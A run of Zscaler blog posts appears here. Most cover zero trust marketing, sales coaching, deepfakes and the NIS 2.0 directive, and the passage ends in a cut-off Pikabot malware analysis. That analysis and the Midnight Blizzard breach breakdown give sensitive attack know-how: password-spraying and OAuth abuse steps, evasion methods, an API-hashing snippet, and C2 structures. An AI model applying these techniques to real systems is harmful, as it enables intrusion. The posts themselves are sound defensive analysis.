https://www.zscaler.com/blogs/product-insights/why-havent-firewalls-and-vpns-stopped-more-organizations-being-breached Reducing cyber risk is an increasingly important initiative for organizations today. Due to the fact that a single cyber breach can be financially fatal as well as disastrous for countless stakeholders, improving cybersecurity has become a board-level concern and drawn increased attention from regulatory bodies around the globe. As a result, organizations everywhere have poured massive amounts of time and money into security technologies that are supposed to protect them from cybercriminals’ malicious ends. Specifically, the go-to tools that are deployed in an effort to enhance security are firewalls and VPNs. Despite the above, breaches continue to occur (and increase in number) at an alarming rate every year. News headlines about particularly noteworthy breaches serve as continual reminders that improperly mitigating risk can be catastrophic, and that the standard tools for ensuring security are insufficient. One needs not look far for concrete examples—the security debacles at Maersk and Colonial Pipeline are powerful, salient illustrations of what can go wrong. With more and more organizations falling prey to our risk-riddled reality, an obvious question arises: Why haven’t firewalls and VPNs stopped more organizations from being breached? The weaknesses of perimeter-based architectures Firewalls and VPNs were designed for an era gone by; when users, apps, and data resided on premises; when remote work was the exception; when the cloud had not yet materialized. And in this age of yesteryear, their primary focus was on establishing a safe perimeter around the network in order to keep the bad things out and the good things in. Even for organizations with massive hub-and-spoke networks connecting various locations like branch sites, the standard methods of trying to achieve threat protection and data protection still inevitably involved securing the network as a whole. This architectural approach goes by multiple names, including perimeter-based, castle-and-moat, network-centric, and more. In other words, firewalls, VPNs, and the architecture that they presuppose are intended for an on-premises-only world that no longer exists. The cloud and remote work have changed things forever. With users, apps, and data all leaving the building en masse, the network perimeter has effectively inverted, meaning more activity now takes place outside the perimeter than within it. And when organizations undergoing digital transformation try to cling to the traditional way of doing security, it creates a variety of challenges. These problems include greater complexity, administrative burden, and cost, as well as decreased productivity and—of primary importance for our topic in this blog post—increased risk. How do firewalls and VPNs increase risk? There are four key ways that legacy tools like firewalls and VPNs increase the risk of breaches and their numerous, harmful side effects. Whether they are hardware appliances or virtual appliances makes little difference. They expand the attack surface. Deploying tools like firewalls and VPNs is supposed to protect the ever-growing network as it is extended to more locations, clouds, users, and devices. However, these tools have public IP addresses that can be found on the internet. This is by design so that the intended users can access the network via the web and do their jobs, but it also means that cybercriminals can find these entry points into the network and target them. As more of these tools are deployed, the attack surface is continually expanded, and the problem is worsened. They enable compromise. Organizations need to inspect all traffic and enforce real-time security policies if they are to stop compromise. But about 95% of traffic today is encrypted, and inspecting such traffic requires extensive compute power. Appliances have static capacities to handle a fixed volume of traffic and, consequently, struggle to scale as needed to inspect encrypted traffic as organizations grow. This means threats are able to pass through defenses via encrypted traffic and compromise organizations. They allow lateral threat movement. Firewalls and VPNs are what primarily compose the “moat” in a castle-and-moat security model. They are focused on establishing a network perimeter, as mentioned above. Relying on this strategy, however, means that there is little protection once a threat actor gets into the “castle,” i.e., the network. As a result, following compromise, attackers can move laterally across the network, from app to app, and do extensive damage. They fail to stop data loss. Once cybercriminals have scoured connected resources on the network for sensitive information, they steal it. This typically occurs via encrypted traffic to the internet, which, as explained above, legacy tools struggle to inspect and secure. Similarly, modern data leakage paths, such as sharing functionality inside of SaaS applications like Box, cannot be secured with tools designed for a time when SaaS apps did not exist. Why zero trust can stop organizations from being breached Zero trust is the solution to the above problems. It is a modern architecture that takes an inherently different approach to security in light of the fact that the cloud and remote work have changed things forever, as described earlier. In other words, zero trust leaves the weaknesses of perimeter-based, network-centric, firewall-and-VPN architectures in the past. With an inline, global security cloud serving as an intelligent switchboard to provide zero trust connectivity (along with a plethora of other functionality), organizations can: Minimize the attack surface: Hide applications behind a zero trust cloud, eliminate security tools with public IP addresses, and prevent inbound connections Stop compromise: Leverage a high performance cloud to inspect all traffic at scale, including encrypted traffic, and enforce real-time policies to stop threats Prevent lateral movement: Connect users, devices, and workloads directly to apps they are authorized to access instead of connecting them to the network as a whole Block data loss: Prevent malicious data exfiltration and accidental data loss across all data leakage paths, including encrypted traffic, cloud apps, and endpoints In addition to reducing risk, zero trust architecture solves problems related to complexity, cost, productivity, and more. If you would like to learn more about zero trust, join our upcoming webinar, “Start Here: An Introduction to Zero Trust.” Or, if you would like to dive deeper on the weaknesses of yesterday’s tools, read our new ebook, “4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches.” Tue, 27 Feb 2024 08:04:02 -0800 Jacob Serpa https://www.zscaler.com/blogs/product-insights/why-havent-firewalls-and-vpns-stopped-more-organizations-being-breached https://www.zscaler.com/blogs/company-news/ai-powered-sales-leadership-transforming-the-playbook-for-world-class-coaching We are in an era of change brought about by AI. There’s a lot of positivity but also uncertainty. For sales leaders, the advent of artificial intelligence (AI) presents an opportunity to rewrite the playbook for optimising our impact across our whole team. There’s an opportunity to capitalise on the processing power of AI to amplify sales leaders’ experience and talent. Currently, I have the privilege of running our sales leadership enablement in EMEA at Zscaler, and advising external GTM leaders. I’ve also been doing some independent research into AI. As such, I have developed a good understanding of the current challenges sales teams face and how AI could assist us in being more effective leaders in the future. Current State: Human-Powered Sales Forecasting In sales, managing the forecast is one of the key challenges for leaders. Managing the forecast today can mean getting intimately involved in as many deals as possible so that you can spot risk, coach the people involved, and drive the right actions and urgency directly. This approach has, in the past, worked effectively at delivering the forecast, but with clear drawbacks: inconsistency, time drain, and inability to scale. Sometimes referred to as the “hero” approach, “saving” deals can be exhausting for leaders and can unintentionally create a micro-management style of culture that can lead to other challenges. In addition, a sales leader can only focus on a few key deals at a time, sometimes sacrificing support for the vast majority. The Data Dilemma Sales leaders are not data analysts. Currently, they are expected to review large amounts of performance data constructively, extract the necessary insights efficiently, and translate these insights into coaching opportunities for their salespeople. Traditionally, we use leading indicators to help us understand what activities will deliver success for our salespeople and sales leaders. These are powerful metrics that shape the weekly and quarterly operating cadence for our teams. These leading indicators are manual inputs. E.g.: Number of new business meetings Number of opportunity progression meetings Proof of values Pipeline coverage, etc. Leading indicators have always been very important because we need a scalable way of measuring how to protect the business now and in the future. However, what every good sales leader knows is that for each person, business unit, region, and market, there are always discrepancies based on the skill of the individual, their tenure, the market, the culture of the region, etc. Therefore, it becomes challenging to cater for these nuances at scale and the manual inputs can feel limited. In an age when we can develop deeper insights, imagine if we could tailor make leading indicators that are fit for each individual, team, or region. The human-powered playbook for sales leaders stops working at scale As the needs of our employees change and the metrics for success remain constant, there is an opportunity to evolve this traditional playbook, looking toward new tools for assistance. Specifically, AI can help us to scale our ability to coach our people, understand potential business risks, and deliver for the business. Future State: AI-Assisted Analysis & Insights to Optimise Sales Coaching The charter for sales leadership has always been about prioritising their people – putting them before the deal and providing the right tools to be successful. Now we have an opportunity to expand our coaching at scale using data to guide us to the right areas of focus. There is a huge opportunity for sales leaders to develop their management style and transition from being dealmakers to being transformative coaches, assisted by AI. You may have heard of the term “Building a Second Brain,” coined by Tiago Forte: “Building a Second Brain is a methodology for saving and systematically reminding us of the ideas, inspirations, insights, and connections we’ve gained through our experience … . A Second Brain ultimately expands our memory and our intellect using modern tools of technology.” AI presents the potential to serve as a second brain, helping bridge the gap between a sea of data to having effective coaching conversations. Ultimately, helping leaders scale. For instance, imagine an AI tech stack that can help us ingest the sea of data across deals, learn the patterns and trends across the entire GTM salesforce, benchmark the performance data against the norm, trend this information and tailor it at scale for specific individuals, then create intuitive, human-like written insights that are easy for sales leaders to understand in the moment so that they can coach their team effectively on where to focus their time and energy. AI could finally be the technology that can help sales leaders develop insights from the pool of performance data in real time so that they can deliver impactful coaching for their people. I’m privileged to be a part of this game changing transformation. It’s an exciting time for all sales leaders if we adapt and evolve the way we think and behave. This topic is top of mind for myself and the other sales leaders at Zscaler and across industries. I welcome you to join the conversation, perhaps by responding to this prompt: How can AI help us rewrite the Sales Leader playbook, and help us become world class coaches? If you’re interested in learning more about the advancements we’re driving and the opportunities for growth within Zscaler’s sales organisation, please DM me directly to begin the conversation. Thu, 22 Feb 2024 07:29:08 -0800 Jason Creane https://www.zscaler.com/blogs/company-news/ai-powered-sales-leadership-transforming-the-playbook-for-world-class-coaching https://www.zscaler.com/blogs/company-news/the-old-social-engineering-playbook-now-with-ai When you’ve been in the security world long enough, you start to see old playbooks being reused, with new technology. Case in point: ‘Deepfake’ has been an increasingly common phrase in the news, describing digitally manipulated video being used to misrepresent a person or falsify identity. The latest example of deepfake targeting, where a successful video call resulted in a 25 million USD money transfer, captured people’s attention for a number of reasons. The main news value was in the enormous amount of money that the attackers were able to steal by faking a single video call. In itself, the technical playbook used to trick the person was nothing new. However, this deepfake example demonstrated once again just how high a level of sophistication is possible when AI is orchestrated creatively. People generally fear a relatively new technology, like AI, because they can’t immediately grasp its full potential and they have a fear of the unknown. Similarly, technological advancements also scare people when they feel like they pose a threat to their sense of security or working lives, such as losing their jobs to AI. The social engineering techniques used by adversaries have continuously evolved and usually these adversaries are faster to adopt new technologies for their benefit than we, the defenders, are to protect their victims. You can see examples of this in the not too distant past: In times of modem connectivity, a common piece of malware would dial up a modem in the middle of the night and connect it to a toll number, leading to enormous bills. A few years ago, a rash of malicious android apps hacked mobile phones to dial toll numbers as a way to make quick and easy money – which was basically a modern form of the old modem dialer tactic. Cryptominers harvesting the compute powers of infected systems was then the next step in this evolution. The human risk factor History has shown us a number of examples of the old social engineering playbook in use. The technique of faking a senior executive‘s voice by reusing publicly available audio clips to threaten users into taking action is already fairly well known. Faking video sessions showing a range of people in a live and interactive call, however, reaches a new (and scary) level of cybercriminal sophistication and has therefore sown a new level of appropriate and respectful fear around AI’s technological evolution. It is the perfect demonstration of how easily humans can be tricked or coerced into taking action – and of bad actors using this to their advantage. But this attack also highlights how a new piece of technology can enable adversaries to do the same tasks they have been doing before, but more efficiently. And bad guys are taking advantage of this technological advancement fast. Unfortunately, the general public is still not fully aware of how social engineering techniques continue to evolve. They don't follow security news and trust that these kinds of attacks will never happen to them. This is what makes traditional security awareness training difficult to prove effective, the public doesn’t believe they (as individuals) will be targeted. So when it does happen, they are unprepared and are duped into falling prey to the social engineering attack. In the wake of this recent attack questions were also raised about how – if AI is really good enough to make these video scenarios look so realistic – an employee would have any chance of detecting the fake. The fact is that human beings are not machines, and they will always be a risk factor as an organisation‘s first line of defence because they will have a variable level of security awareness (no matter how good the internal training process might be). Imagine if someone has a bad night or returns home late from a business trip or sports event. They simply might not be as laser-focused on detecting modern social engineering techniques or paying attention to the details the following day. The big challenge is that AI won’t have an off day – its targeting will remain consistent. The technology to fight these playbooks already exists – but it is not widely used The fact that these kind of plays keep working shows that businesses have not yet adapted their security and organisational processes to handle them. One way to counteract deep fakes videos starts at the (security) process level. My first idea is a simple one: to ensure that teleconferencing systems include a function to authenticate a logged-on user as a human being. A straightforward plug-in could do the job, employing two-factor authentication to verify an identity within Zoom or Teams, for example. Hopefully such an API would be fairly easy to develop and would be a huge step forward in preventing sniffing attacks via the phone as well. Additionally, the mindset about being afraid of AI has to change. It is an amazing piece of technology, not only when it is misused. Society just needs to understand its boundaries. AI can actually be implemented to stop these sorts of modern attacks if security executives learn how to control the problem and use the technology to get ahead of the bad actors. Deception technologies already exist, and AI can be used to detect anomalies much faster and more effectively, showing its potential for good. From a more all-up security perspective, adapting a Zero Trust mentality for security can enable organisations to continually improve their security posture on the process level. Zero Trust could not only help on a connectivity level, but it could also improve security workflows, which helps to verify whether everyone in a call is authenticated against an internal directory. Zscaler‘s Identity Threat Detection and Response (ITDR) is already mitigating threats that are targeting a user’s identity. With the help of the new service, the risk to identities is becoming quantifiable, misconfigurations are being detected, and real-time monitoring and privileged escalations are helping to prevent breaches. Finally – going back to the initial example of the successful deepfake – it is hard to believe that you can transfer so much money in a modern organization without verification processes operating in the background. Organisations would be well advised to check the overall risk level of such processes within their own infrastructure. It would raise the barriers to an attack greatly, if solid administrative processes were put in place to reduce risk – not only in the security organisation, but for operational processes like payments authentication as well. Not everything needs to be enhanced by a technological solution. Sometimes a new procedure where two people must sign off on a funds transfer could be the step which protects the organization from losing $25m USD. Tue, 20 Feb 2024 05:54:06 -0800 James Tucker https://www.zscaler.com/blogs/company-news/the-old-social-engineering-playbook-now-with-ai https://www.zscaler.com/blogs/company-news/nis-2-0-new-cybersecurity-rules-eu Back in 2021, the White House issued an executive order compelling federal government agencies to develop a plan for implementing a zero trust architecture. This was followed by a memorandum that mandated federal agencies to achieve specific zero trust security goals by the end of 2024. Last year, as you may have heard, the SEC in the United States issued new rules compelling publicly traded companies to disclose material cybersecurity breaches. As it’s happened, the SEC has wasted no time in showing its regulations have teeth, with the first prosecutions having already taken place. So, there’s a lot going on in the USA, but it’s not the only place in the world where policymakers are pushing for—or even mandating—the adoption of zero trust principles. This year the European Union will be updating and tightening its Network and Information Systems (NIS) directive, and as anyone who experienced the arrival of the GDPR regulations on privacy will tell you, the reach of EU regulations can be great indeed. NIS 2.0 The NIS 2.0 directive comes into force in October 2024, mandating that management bodies within organizations in specific categories implement cybersecurity risk management measures. Impacted categories extend to: Energy Transport Banking Financial market infrastructure Health Drinking water Wastewater Digital infrastructure ICT service management (B2B) Public administrations Space Postal and courier services Waste management Manufacture, production, and distribution of chemicals Food production, processing, and distribution Manufacturing Digital providers Research As you can see, the directive is focused on critical physical and digital infrastructure within EU member states, but it also has reach. It applies not only to organizations within the EU, but also to any organization worldwide that provides services to any of the protected sectors within the EU. As with the SEC regulations, there are strict rules for prompt incident reporting. The stick The picture is abundantly clear at this point. Government bodies in regions covering hundreds of millions of citizens have recognized that the risk of inadequate cybersecurity practices is severe enough to warrant strict regulations and even severe penalties. The carrot has been in place for many years—now comes the stick! The carrot So, what’s the carrot? What are the positive aspects to strengthening your security defenses? Sure, it starts with reducing cyberattack risk and achieving compliance, but what else? Organizations that implement robust cybersecurity practices stand to gain significantly in terms of cost reduction, competitiveness, business continuity, and customer trust. Not just one carrot, but a whole bunch! Help is at hand. The NIS 2.0 directive itself includes clear guidance on how to improve your cybersecurity stance, and you won’t be surprised to learn that the first recommended cyber hygiene practice listed is the adoption of zero trust principles. In fact, as you review these lengthy regulatory and legal requirements, zero trust comes up routinely as the holy grail to aim for. “Users should log into applications, rather than networks” Help is also available from Zscaler, where we’ve been designing and building the foundational pillars of a zero trust architecture since 2007. If you’d like to speak to someone about implementing zero trust and achieving regulatory compliance, whatever your industry, please get in touch. Alternatively, join one of our monthly introductory webinars to learn more and ask questions. Click here and search ‘start here’ to find the next session to sign up for. Tue, 20 Feb 2024 00:00:02 -0800 Simon Tompson https://www.zscaler.com/blogs/company-news/nis-2-0-new-cybersecurity-rules-eu https://www.zscaler.com/blogs/product-insights/microsoft-midnight-blizzard-and-scourge-identity-attacks Summary On January 19, 2024, technology leader Microsoft disclosed that it had fallen victim to a Russian state-sponsored cyberattack that gave the threat actors access to senior management mailboxes and resulted in sensitive data leakage. While we will break down the attack step-by-step and explain what organizations can do to defend against similar attacks below, here’s a TL;DR. The threat actor Midnight Blizzard: State-sponsored Russian threat actor also known as Nobelium, CozyBear, and APT 29 Notable Midnight Blizzard breaches: Hewlett Packard Enterprise (December 12, 2023) and SolarWinds (December 14, 2020) The facts Attack target: Microsoft’s Entra ID environment Techniques used: Password spraying, exploiting identity and SaaS misconfigurations Impact: Compromised Entra ID environment, unauthorized access to email accounts of Microsoft’s senior leadership team, security team, legal, and more What’s unique about the attack? Using stealthy identity tactics that bypasses existing defenses to compromise users Exploiting misconfigurations in SaaS applications to gain privileges Exploiting identity misconfigurations in Entra ID to escalate privileges The attack sequence Found a legacy, non-production test tenant in Microsoft’s environment. Used password spraying via residential proxies to attack the test app tenant. Limited the number of attack attempts to stay under the threshold and evade blocking triggered by brute forcing heuristics. Guessed the right password and compromised the test tenant’s account. Generated a new secret key for the Test App that allowed the threat actor to control the app every where it was installed. Test App was also present in the corporate tenant. Threat actor used the app’s permissions to create an admin user in the corporate tenant. Used the new admin account to create malicious OAuth apps. Granted the malicious app the privilege to impersonate the users of the Exchange service. Used the malicious app to access Microsoft employee email accounts. Microsoft’s official guidance Defend against malicious OAuth applications Audit privileged identities and apps in your tenant Identify malicious OAuth apps Implement conditional access app control for unmanaged devices Protect against password spray attacks Eliminate insecure passwords Detect, investigate, and remediate identity-based attacks Enforce multi factor authentication and password protections Investigate any possible password spray activity Zscaler’s guidance Continuously assess SaaS applications for misconfigurations, excessive permissions, and malicious changes that open up attack paths. Continuously assess Active Directory and Entra ID (previously known as Azure AD) for misconfigurations, excessive permissions, and malicious changes that open up attack paths. Monitor users with risky permissions and misconfigurations for malicious activity like DCSync, DCShadow, kerberoasting, etc. that is typically associated with an identity attack. Implement containment and response rules to block app access, isolate the user, or quarantine the endpoint on an identity attack detection. Implement deception to detect password spraying, Entra ID exploitation, Active Directory exploitation, privilege escalation, and lateral movement for instances where stealthy attacks bypass existing detection and monitoring controls. Deconstructing the attack The threat actor Midnight Blizzard has had a long history of pulling off highly publicized breaches. It’s Microsoft this time around, but in the past, they’ve allegedly compromised Hewlett Packard Enterprise and SolarWinds. To people who analyze attacks for a living, the Microsoft breach should not come as a surprise. Midnight Blizzard is among a growing list of nation-state and organized threat actors that rely on identity compromise and exploiting misconfigurations/permissions in SaaS applications and identity stores to execute breaches that conventional security thinking cannot defend against. Other threat groups using these strategies and techniques include Evil Corp, Lapsus$, BlackMatter, and Vice Society. In case of the Microsoft breach, the attackers demonstrated a profound understanding of OAuth mechanics and attack techniques to evade detection controls. They created malicious applications to navigate Microsoft's corporate environment. And by manipulating the OAuth permissions, they granted themselves full access to Office 365 Exchange mailboxes, enabling them to easily exfiltrate sensitive emails. Security challenges Identity-centric tactics: Midnight Blizzard strategically targeted identities, exploiting the user's credentials as a gateway to sensitive data. Conventional detection controls like EDRs are not effective against such attacks. OAuth application abuse: The adversaries adeptly abused OAuth applications, a technique that complicates detection and enables prolonged persistence. Misconfiguration blind spots: Identifying misconfigurations within Active Directory/Entra ID and SaaS environments remains a complex task, often resulting in blind spots for defenders. Step-by-step breakdown Pre-breach Before the attack commenced, an admin within Microsoft's test tenant had created an OAuth app. For the purpose of this blog post, let’s call this app ‘TestApp.’ For reasons unknown, this app was subsequently installed in Microsoft's corporate environment with elevated permissions, likely encompassing the scope Directory.ReadWrite.all, granting it the capability to create users and assign roles. Notably, this app appeared to be dormant and possibly forgotten. ThreatLabz note: There is an unimaginable sprawl of applications, users, and associated misconfiguration and permissions that security teams often have no visibility into. More often than not, blind spots like these are what result in publicized breaches. Initial access In late November 2023, Midnight Blizzard initiated reconnaissance on Microsoft's SaaS environment. Discovering the test tenant, the attacker targeted its admin account, which, being a test account, had a weak, guessable password and lacked multi-factor authentication (MFA). Employing a password spraying attack, the attacker systematically attempted common passwords to gain access, leveraging residential proxies to obfuscate their origin and minimize suspicion. Eventually, the attacker successfully compromised the admin account. ThreatLabz note: Traditional threat detection and monitoring controls are ineffective against attacks that use valid credentials, MFA-prompt bombing, and other identity-centric techniques to compromise users. Persistence With control over the admin account, the attacker obtained the ability to generate a new secret key for TestApp, effectively commandeering it across all installations. This tactic mirrors techniques observed in the SolarWinds attack of 2020. ThreatLabz note: In the absence of continuous monitoring and high-confidence alerting for malicious changes being made to permissions in SaaS applications, attacks like these easily cross the initial access phase of the kill chain. Privilege escalation Given TestApp's permissions within Microsoft's corporate tenant, the attacker created a new user, likely an administrator, to further their access. Subsequently, the attacker deployed additional malicious OAuth apps within the tenant to evade detection and ensure persistence, leveraging TestApp to grant elevated roles, such as Exchange role EWS.full_access_as_app, facilitating mailbox access and bypassing MFA protection. ThreatLabz note: Configuration and permission based blindspots extend to identities themselves. As such, it is imperative that organizations have the ability to continuously assess their Active Directory/Entra ID for misconfigurations, excessively permissive policies, and other permissions that give attackers the ability to escalate privileges from a compromised identity. They should also continuously monitor for malicious changes in the identity store that might potentially be creating additional attack surfaces. Lateral movement Though specifics regarding the number and origin of installed apps remain unclear, the attacker's utilization of TestApp to confer privileges is evident. This culminated in unauthorized access to mailboxes belonging to Microsoft's senior leadership, security personnel, legal team, and other stakeholders. How zero trust can help A zero trust architecture provides a fundamentally secure approach that is better at protecting against stealthy attacks that are used by nation-state threat actors and organized adversaries. Zero trust fundamentally eliminates weaknesses in your environment that are core properties of hub and spoke network models. Below is a 10,000 foot reference architecture for zero trust that explains how and why it better protects against Midnight Blizzard-style attacks. Core zero trust capabilities This is the heart of a zero trust architecture consisting of Internet Access and Private Access. The Zero Trust Exchange acts as a switchboard brokering all connections between users and applications. This architecture makes your applications invisible to the Internet, thereby eliminating the external attack surface, replaces high-risk VPNs, and uses segmentation to reduce lateral threat movement and internal blast radius. To broker the connection, the Zero Trust Exchange verifies the identity, determines the destination, assesses risk, and enforces policy. ThreatLabz note: Zscaler extends core zero trust capabilities with SaaS supply chain security, Identity Posture Management, ITDR, Deception, and Identity Credential Exposure to eliminate application and identity misconfigurations, detect stealthy attacks, and provide visibility into exposed credentials on endpoints to remove lateral movement paths. Below, we breakdown what each of these capabilities can do. SaaS Security While the move to the cloud and SaaS applications has aided organizations to accelerate their digital transformation, it has also created a new set of security challenges. Among these, the lack of visibility into dangerous backdoor connections to SaaS applications is paramount as it creates supply chain risk — the kind that was exploited in the Microsoft breach. SaaS Security strengthens your security posture by providing visibility into third-party application connections, over-privileged access, risky permissions, and continuous monitoring for changes that can be malicious in nature. It is a core step in securing your SaaS environment. Identity Posture Management Nine in ten organizations are exposed to Active Directory attacks and there has been a 583% increase in Kerberoasting and similar identity attack techniques in 2023 alone. These are not isolated phenomena. Misconfigurations and excessive permissions in Active Directory and other identity providers are what enable these types of attacks. For example, an unprivileged account without MFA having the ability to control an application with privileged roles should be flagged, but most security teams do not have appropriate visibility into these types of misconfigurations. Identity Posture Management augments zero trust by providing security teams visibility into identity misconfigurations, policies, and permissions that open up potential attack paths. With periodic assessments, security teams can leverage remediation guidance to revoke permissions, limit policies, and remove misconfigurations. Identity Posture Management also alerts security teams to malicious changes in the Active Directory in real time. Deception and ITDR (Identity Threat Detection and Response) As evidenced in the Microsoft breach, attackers used password spraying from a residential proxy and limited the number of tries to evade detection. Traditional threat detection and monitoring approaches just do not work here. Deception, on the other hand, is a pragmatic approach that can detect these attacks with fairly high confidence. Decoy users created in Entra ID can detect such password spraying attacks without false positives or the need to write complex detection rules. ITDR can detect identity-specific attacks like DCSync, DCShadow, and Kerberoasting that would otherwise require detection engineering and significant triage to spot. Identity Credential Exposure While TTPs (Techniques, Tactics, and Procedures) were not reported for credential exploitation, credentials and other sensitive material (like username, passwords, authentication tokens, connection strings, etc.) on the endpoint in files, registry, and other caches are something that threat actors like Volt Typhoon, Scattered Spider, BlackBasta, BlackCat, and LockBit are known to have exploited in publicly reported breaches. Identity Credential Exposure provides security teams with visibility into credential exposure across their endpoint footprint, highlighting blind spots that open up lateral movement and data access paths from the endpoint. Zero trust creates multiple opportunities to detect and stop Midnight Blizzard-style attacks Problem Solution How does it work? MITRE ATT&CK Technique Password spraying Zscaler Deception Decoy user accounts in Entra ID can detect any attempts to sign in using the credentials of the decoy users. Any failed/successful attempts will be logged to detect attacks like password spraying T1110.003 - Brute Force: Password Spraying T1078.004 - Valid Accounts: Cloud Accounts Existence of apps/SPNs with high privilege Zscaler ITDR ITDR can surface unprivileged accounts that have a path (e.g., owner rights) to apps with privileged roles NA Creation of apps/SPNs with high privilege Zscaler SaaS Security Monitoring for and alerting when a risky app is added, app is created by an unverified publisher, and when an app hasn’t been used in a while There is no technique that maps to this but in terms of the nature of the technique, the ones listed below are a close approximation of how you think of the attack. T1136.003 - Create Account: Cloud Account T1098.003 - Account Manipulation: Additional Cloud Roles Creation/modification of users with high privileges Zscaler ITDR Monitoring of an alerting on unauthorized addition of privileged permissions to principals T1136.003 - Create Account: Cloud Account T1098.003 - Account Manipulation: Additional Cloud Roles Secret addition to apps Zscaler SaaS Security Flags applications with multiple Application Secrets T1098.001 - Account Manipulation: Additional Cloud Credentials Disabled MFA Zscaler ITDR Find accounts where MFA is disabled and get alerts when MFA is disabled for any account T1556.006 - Modify Authentication Process: Multi-Factor Authentication Consent grants Zscaler SaaS Security Monitors inclusion of high risk scopes like EWS.full_access_as_app or EWS.AccessAsUser.All to alert on the app’s risk level T1098.003 - Account Manipulation: Additional Cloud Roles T1098.002 - Account Manipulation: Additional Email Delegate Permissions What should I do next? Identity is the weakest link. Irrespective of whether you are running a zero trust architecture or not, start by getting visibility into identity misconfigurations and excessive permissions that can allow attackers to grant themselves privileges. We’re offering a complimentary Identity Posture Assessment with Zscaler ITDR. Gain visibility into your SaaS sprawl and find dangerous backdoor connections that can give attackers the ability to establish persistence. Request an assessment with Zscaler SaaS Security. Implement Deception irrespective of what other threat detection measures you have. It is one of the highest ROI threat detection controls that you can implement, augmenting controls like EDR. Zscaler Deception has a comprehensive set of decoys that can deceive and detect sophisticated attackers. If you are a Zscaler customer, contact your account manager for support on these assessments and Deception rollout. Tue, 13 Feb 2024 17:10:20 -0800 Amir Moin https://www.zscaler.com/blogs/product-insights/microsoft-midnight-blizzard-and-scourge-identity-attacks https://www.zscaler.com/blogs/security-research/d-evolution-pikabot Introduction Pikabot is a malware loader that originally emerged in early 2023. Over the past year, ThreatLabz has been tracking the development of Pikabot and its modus operandi. There was a significant increase in usage of Pikabot in the second half of 2023, following the FBI-led takedown of Qakbot. This was likely the result of a BlackBasta ransomware affiliate replacing Qakbot with Pikabot for initial access. However, Pikabot ceased activity shortly after Christmas 2023, with its version number being 1.1.19 at that time. In recent campaigns, which started in February 2024, Pikabot reemerged with significant changes in its code base and structure. Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications. Key Takeaways Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023. In December 2023, Pikabot activity ceased, possibly as a result of a new version of Qakbot that emerged. In February 2024, a new version of Pikabot was released with significant changes. Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Pikabot now stores all configuration elements in a single memory block, similar to Qakbot. In prior versions, Pikabot decrypted necessary configuration elements only when required. Pikabot continues to use HTTP for command-and-control, but its network protocol has changed, including the network command IDs and the encryption algorithms. Technical AnalysisAs covered in our previous technical analysis of Pikabot, the malware consists of two components: a loader and a core module. The core module is responsible for executing commands and injecting payloads from a command-and-control server. The malware uses a code injector to decrypt and inject the core module. It employs various anti-analysis techniques and string obfuscation. Pikabot uses similar distribution methods, campaigns, and behaviors as Qakbot. The malware acts as a backdoor, allowing the attacker to control the infected system and distribute other malicious payloads such as Cobalt Strike.In the following sections, we will describe the latest Pikabot variant, including its capabilities and notable changes compared to previous versions. The analysis was performed on Pikabot binaries with version 1.8.32.Anti-analysis techniquesAs with previous versions of Pikabot, this variant employs a series of different anti-analysis techniques to make the analysis more time-consuming. It should be noted that none of the methods below presents any significant advanced capabilities. Furthermore, Pikabot used a series of more advanced detection features in its loader component in previous versions of the malware.Strings encryptionThe most notable change is the string obfuscation. In previous versions of Pikabot, each string was obfuscated by combining the RC4 algorithm with AES-CBC. This method was highly effective in preventing analysis, particularly when it came to automated configuration extraction. To successfully analyze Pikabot, an analyst would need to detect not only the encrypted string but also its unique RC4 key. Additionally, they would need to extract the AES key and initialization vector, which are unique to each Pikabot payload.It should be noted that the approach the Pikabot malware developers followed is similar to the ADVobfuscator.In the latest version of Pikabot, the majority of the strings are either constructed by retrieving each character and pushing it onto the stack (Figure 1) or, in some rare cases, a few strings are still encrypted using the RC4 algorithm only.Figure 1. String stack constructionJunk instructionsThis anti-analysis technique was also implemented in previous versions of Pikabot. Pikabot inserts junk code between valid instructions. The junk code is either inlined in the function or a call is made to a function, which contains the junk code (Figure 2).Figure 2. Junk codeAnti-debug methodsPikabot uses two methods to detect a debugging session. They are:Reading the BeingDebugged flag from the PEB (Process Environment Block).Calling the Microsoft Windows API function CheckRemoteDebuggerPresent.Pikabot constantly performs the debugging checks above in certain parts of its code. For example, when it (en/de)codes network data or when it makes a request to receive a network command.Anti-sandbox evasionIn addition to the anti-debugging checks above, Pikabot uses the following methods to evade security products and sandboxes:Pikabot utilizes native Windows API calls.Pikabot delays code execution at different stages of its code. The timer is randomly generated each time.Pikabot dynamically resolves all required Windows API functions via API hashing.A Python representation of the algorithm is available below.api_name = b"" checksum = 0x113B for c in api_name: if c > 0x60: c -= 0x20 checksum = (c + (0x21 * checksum)) & 0xffffffff print(hex(checksum))Language detectionIdentical to previous versions, Pikabot stops execution if the operating system's language is any of the following:Russian (Russia)Ukrainian (Ukraine)This is likely an indication that the threat actors behind Pikabot are Russian-speaking and may reside in Ukraine and/or Russia. The language check reduces the chance of law enforcement action and potential criminal prosecution in those regions.Bot initialization phaseUnlike previous versions, this version of Pikabot stores all settings and information in a single structure at a global address (similar to Qakbot). The analyzed structure is shown below. For brevity, we redacted non-important items of the structure (such as Windows API names).struct bot_structure { void *host_info; WINHTTPAPI winhttp_session_handle; bool bot_error_init_flag; FARPROC LdrLoadDll; FARPROC LdrGetProcedureAddress; FARPROC RtlAllocateHeap; FARPROC RtlReAllocateHeap; FARPROC RtlFreeHeap; FARPROC RtlDecompressBuffer; FARPROC RtlGetVersion; FARPROC RtlRandomEx; ---redacted— wchar_t* bot_id; bool registered_flag; int process_pid; int process_thread_id; int* unknown_unused_1; unsigned short os_arch; unsigned short dlls_apis_loaded_flag; int unknown_unused_2; unsigned char* host_rc4_key; int number_of_swap_rounds; int beacon_time_ms; int delay_time_ms; // Used only during the initialization phase of Pikabot. int delay_seed_mul; wchar_t* bot_version; wchar_t* campaign_tag; wchar_t* unknown_registry_key_name; cncs_info* active_cnc_info; cncs_info* cncs_list; int num_of_cncs; int unknown_unused_3; int max_cnc_attempts; wchar_t* user_agent; void* uris_array; void* request_headers_array; TEB* thread_environment_block; }; struct cncs_info { wchar_t* cnc; int cnc_port; int http_connection_settings; // If set to 1 then server’s certificate validation is ignored and sets the flags WINHTTP_FLAG_SECURE | WINHTTP_FLAG_BYPASS_PROXY_CACHE int connection_attempts; bool is_cnc_unavailable; cncs_info* next_cnc_ptr; };Bot configurationThe latest version of Pikabot stores its entire configuration in 